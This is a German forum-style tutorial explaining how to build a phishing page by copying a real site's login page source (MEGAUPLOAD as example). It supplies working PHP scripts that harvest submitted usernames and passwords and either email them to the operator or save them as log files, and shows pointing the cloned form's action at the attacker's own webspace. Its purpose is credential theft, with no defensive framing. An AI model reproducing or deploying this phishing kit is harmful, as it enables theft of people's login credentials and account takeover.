Wie erstelle ich eine Phishing Seite?

Wie erstelle ich eine Phishing Seite?

Guten Tag und Herzlich Willkommen zu meinem Tutorial „Wie erstelle ich eine Phishing Seite?“. Ich dachte mir, da immer wieder Fragen zu diesem Thema aufgekommen sind erstelle ich einfach ein Tutorial dazu.

1.1 Was ist eine Phishing Seite?

Phishing Seiten sind allgemein gesagt, Seiten die versuchen über falsche WWW-Adressen an Daten eine Internet-Benutzers zu kommen. Phishing Seiten sind allgemein genau so aufgebaut wie die Zielseite, daher kann man eine Phishing Seite fast nur schwer am Aussehen erkennen. Klick mich!

1.2 Erste Schritte

Was brauchen wir alles um eine vernümpftige Phishing Seite zu erstellen? Klar, alles drum und dran, um mir das lästige Aufzählen bei diesem Schritt zu ersparen verweise ich an dieser Stelle einfach mal auf Gumball’s –Thread.

1.3 Wie erstelle ich meine Phishing Seite?

Also zuerst solltet ihr euch sicher sein, was für eine Phishing Seite ihr erstellen wollt. Ich in meinem Beispiel habe jetzt einfach mal MEGAUPLOAD genommen. So nun öffnet ihr mit STRG+U den Quelltext der Seite und kopiert ihn komplett. Dann öffnet ihr mit eurem Editor ein neues Dokument, fügt den Quelltext ein und speichert es als *.html ab. Jetzt geht es ab in den HTML-Quelltext, also das ganze nochmal mit dem Editor öffnen. Jetzt müsst ihr erstmal schauen, das alle Grafikelemente, wenn unsere Datei auf unserem FTP liegt auch richtig angezeigt werden. Solltet ihr Probleme mit dem Favicon haben, bindet ihr es einfach in den HEAD mit dem Tag ein.

[php]
<link rel="SHORTCUT ICON" href="favicon.ico" type="image/x-icon">
[/php]

Wie kommt man an das Favion? Gebt einfach hinter der URL „favicon.ico“ ein z.B. „google.com/favicon.ico“. Wenn das alles geklärt ist suchen wir dann nach dem Eingabefeld für den Benutzernamen und dem Password. Sieht dann ungefähr so aus:

[php]
<form action="" method="POST">
Username: <input type="text" name="username">
Password: <input type="password" name="password">
<input type="submit" value="Login">
</form>
[/php]

Achtung! Bitte beachten, das ist nur ein Beispiel und nicht der orginal Quellcode von MEGAUPLOAD.

So soweit so gut. Nun kümmert ihr euch erstmal um den Code eurer PHP-Datei die die Daten „abfangen“ soll. Also erstellen wir eine neue PHP-Datei und müssen uns vorher fragen ob ich nun eine *.log-Datei auf einem FTP angelegt haben möchte mti Username und Passwort ODER ich mir die Daten per E-Mail zuschicken lasse.

Mail-Methode:

[php]
<?php
$username = $_POST[‚username‘];
$password = $_POST[‚password‘];

$to = "E-Mail";
$subject = "Betreff";
$content = "Username: ".$username ."\r\nPassword: ".$password;
mail($to, $subject, $content);
?>
[/php]

Log-Methode:
[php]
<?php
$dir = "/";
$username = $_POST[‚username‘];
$password = $_POST[‚password‘];
$title = $username;
$content = "Username: ".$username ."\r\nPassword: ".$password;
$filename = $dir.$title.".log";
$handle = fopen($filename, "w");
fwrite($handle, $content);
fclose($handle);
?>
[/php]

Wenn wir nun unsere PHP-Datei mit Leben gefüllt haben, geben wir dieser einen Namen. Ich habe sie in dem Fall „send.php“ genannt. Nun begeben wir uns wieder in den Quelltext unserer HTML-Datei und füllen nun das leere action-Attribut. Beispiel:

[php]
<form action="http://webspace.de/send.php" method="POST">
Username: <input type="text" name="username">
Password: <input type="password" name="password">
<input type="submit" value="Login">
</form>
[/php]

Sobald nun der Button betätigt wird, werden die Daten an die „send.php“ gesendet und von dort aus weitergeleitet. So das war’s. Ich hoffe es hat euch weiter geholfen.
Credits: Nintendo
MfG